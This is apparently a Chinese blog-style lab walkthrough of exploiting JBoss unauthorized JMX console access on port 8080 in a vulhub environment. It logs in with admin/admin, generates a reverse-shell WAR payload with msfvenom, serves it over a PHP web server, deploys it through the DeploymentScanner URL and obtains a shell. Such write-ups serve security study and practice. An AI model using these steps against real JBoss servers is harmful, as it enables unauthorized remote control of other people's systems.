首页 > 其他分享 >Jboss未授权访问-8080

Jboss未授权访问-8080

时间:2024-10-16 12:46:19浏览次数:1  
标签:8080 40.130 192.168 Jboss 访问 授权

Jboss未授权访问 √

基础了解

JBOSS是一个基于J2EE的开放源代码的应用服务器。JBoss是一个管理EJB的容器和服务器。一般与Tomcat与Jetty绑定使用

Jboss未授权漏洞是指未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell

环境部署

vulhub: vulhub/jboss/CVE-2017-7504

image-20240226220709321

访问后:
image-20240226220801468

然后打开JMX Console:

image-20240226220846709

使用弱口令admin / admin登录

然后访问http://192.168.40.130:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL

image-20240227114732363

然后生成马:

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.40.130 lport=6666 -f war > /tmp/a.war

执行:

cd /tmp
php -S 0.0.0.0:80

即http://192.168.40.130/a.war

部署应用:

image-20240227115232547

image-20240227115347684

访问http://192.168.40.130:8080/a可以看到拿到shell:

image-20240227122302590

标签:8080,40.130,192.168,Jboss,访问,授权
From: https://www.cnblogs.com/starme/p/18469639

相关文章

  • rsync未授权-873
    环境搭建https://www.freebuf.com/articles/web/278245.htmlrsync:/vulhub/rsync/common/-https://blog.csdn.net/weixin_45006525/article/details/123873166vulfocusdockerpullvulfocus/vulfocus:latestdockerrun-d-p80:80-v/var/run/docker.sock:/var/run/docke......
  • Redis未授权-6379
    原理分析Redis默认情况下,会绑定在0.0.0.0:6379,这样将会将Redis服务暴露到公网上如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功在......
  • redis未授权访问及利用总结
    Redis未授权访问漏洞漏洞原理redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据,并且可以利用redis写入shell、写入公钥等危险操作漏洞复现安装redis下载安装包后进行解......
  • 第105天:权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE
    演示案例Linux-Rsync未授权访问覆盖-本地Linux-Docker组用户挂载目录-本地Linux-Sudo(CVE-2021-3156)-本地Linux-Polkit(CVE-2021-4034)-本地Rsync(未授权访问)Rsync是linux下一款数据备份工具,默认开启873端口https://vulhub.org/#/environments/rsync/common/借助Linux默认......
  • 微信小程序登录授权获取基础信息
            最近在写小程序项目时遇到一些问题,小程序登录授权API接口调用会区分新旧版本库,旧版本在调取wx.getUserProfile接口时会直接从底部弹窗,从而允许或取消授权;而新版本库则需要自行设置弹窗,提醒用户授权使用。    测试新版本和旧版本究竟是哪个可以自动底......
  • Adobe Acrobat Pro 中文授权版
    AdobeAcrobatPro是Adobe出品的一款PDF转换软件,可以用于创建和编辑包含多媒体的PDF文件、更安全地共享信息以及更高效地收集反馈。该版本已授权,可以使用全部功能。使用说明:1、将压缩文件解压到固定位置,不要随意移动。2、解压后,双击start_Acrobat.bat来运行软件下载......
  • 如何保护网站免受未经授权的机器人访问
    在数字化时代,机器人流量已成为网站管理员和安全团队面临的重大挑战。机器人流量,即由自动化软件而非人类产生的网络流量,可能对网站的数据分析、安全性和整体性能产生重大影响。为了有效应对这一问题,本文将探讨一系列先进的策略,以检测和防止未经授权的机器人访问。1.使用验证码验证......
  • 写真打赏系统源码无加密无授权无后门
    网站更新写真打赏系统源码版本可对接易支付前端可对接付费进群系统男粉经济变现神器!源码下载:HC网络搭建教学:【2024最新写真打赏系统,写真系统源码搭建教学-哔哩哔哩】 ......
  • 组织: 阶级: 组织+管理+授权+组织结构设计+ 角色 + 分工: individual类型: 体力+普工+
    组织:阶级:组织+管理+授权+资源管理+组织结构设计+角色社会:教育分科+分工:individual类型:体力:普工:砖头,销售文职:上传下达,文书专业:一招鲜,专家管理:人精高管:人上人企业主:金富民官员:高官:分封贵族:家族尊贵,出生关系帝王:砖头:哪里需要哪里搬,价值:自我:社......
  • PbootCMS授权码设置,PbootCMS如何绑定多个域名
    在PBootCMS中,如果你需要为一个网站设置多个域名,并且每个域名都需要绑定授权码,可以通过以下步骤来实现:步骤在PBootCMS官网授权多个域名在后台填写多个授权码详细步骤1.在PBootCMS官网授权多个域名登录PBootCMS官网访问PBootCMS官网。输入用户名和密码登录。授权......